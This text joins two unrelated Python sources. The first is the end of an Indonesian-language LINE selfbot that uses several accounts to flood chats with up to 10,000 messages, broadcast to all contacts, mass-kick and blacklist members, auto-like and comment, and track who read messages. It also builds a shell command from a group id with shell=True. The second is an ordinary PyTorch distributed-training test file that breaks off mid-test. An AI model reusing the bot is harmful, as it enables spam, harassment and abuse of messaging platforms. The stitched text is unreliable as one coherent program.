cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#------------------- Spam functions end ----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
# Keke is pretty <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
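# "Join all" pulls every helper account into the group: the join-by-ticket
# guard is temporarily lifted, a fresh ticket is reissued, each helper joins
# via that ticket, and the guard is restored afterwards.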
elif msg.text in ["Join all"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#-------------------------------------------------
elif "/say-jp " in msg.text:
say = msg.text.replace("/say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#------------------------------------------------
elif "/say-en " in msg.text:
say = msg.text.replace("/say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#-----------------------------------------------
elif "/say " in msg.text:
psn = msg.text.replace("/say ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#-----------------------------------------------
elif "Siapa " in msg.text:
tanya = msg.text.replace("Siapa ","")
jawab = ("Dia yg kebanyakan micin"," Dia gila")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
elif "Dosa @" in msg.text:
tanya = msg.text.replace("Dosa @","")
jawab = ("60%","70%","80%","90%","100%","Tak terhingga")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendText(msg.to,"Dosanya adalah cek voie ini")
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
#==========================================
elif "/ " in msg.text.lower():
txt = msg.text.replace("kedapkedip ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#------- Check lurkers (sider), Siri-style -----------------------------
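# "Setlastpoint" truncates dataSeen/<group id>.txt; lines of the form
# "mid|timestamp" (presumably appended elsewhere by the read-receipt
# handler) accumulate in it, and "Viewlastseen" parses those lines to list
# who has read past the saved point (timestamps are in milliseconds).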
elif "Setlastpoint" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
#cl.sendText(msg.to, "Checkpoint checked!")
cl.sendText(msg.to, "Set the lastseens' point(`・ω・´)\n\n" + datetime.now().strftime('%H:%M:%S'))
print "Setlastpoint"
#--------------------------------------------
elif "Viewlastseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,-1,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%d日 %H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
grp = '\n• '.join(str(f) for f in dataResult)
total = '\nThese %i users have seen the last-seen point(`・ω・´)\n\n%s' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "• %s %s" % (grp, total))
else:
cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen")
print "Viewlastseen"
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda m: m == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["Ats","Tag","mention all"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots or op.param2 in admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
pass
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
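# Background worker: autoSta polls the timeline in a loop, auto-liking posts
# (and commenting, unless the author is comment-blacklisted) whenever the
# corresponding wait flags are on; after repeated failures (count reaching
# 50) it exits. Note there is no sleep in the loop, so it polls as fast as
# the API allows.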
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
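# Main loop: fetchOps long-polls for up to 5 operations per call; the local
# revision cursor is advanced past every processed op so the same op is not
# fetched twice, and each op is dispatched to bot().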
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test_c10d_common.py
|
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
import unittest
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
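# For example (a sketch, assuming 4 visible GPUs and world_size=2), this
# returns [[0, 1], [2, 3]]: rank 0 uses GPUs 0-1 and rank 1 uses GPUs 2-3.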
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel tests don't seem to call the FileStore destructor.
# TODO: investigate; this test is known to have issues.
# Use this hack to remove files for that test.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
for p in model.parameters():
    self.assertEqual(p.grad, expected_grad)
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
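# Hedged sketch (not from the original file): a gradient-averaging comm hook
# in the same shape as `_simple_hook` above, but performing a real allreduce.
# It follows the pattern documented for `register_comm_hook`; treat it as an
# illustration, not the canonical implementation.
def _allreduce_avg_hook(state, bucket):
    # Pre-divide so the summed result is the mean across ranks.
    tensor = bucket.buffer().div_(dist.get_world_size())
    fut = dist.all_reduce(tensor, async_op=True).get_future()

    def extract(fut):
        # The future resolves to a list containing the reduced tensor.
        return fut.value()[0]

    return fut.then(extract)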
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
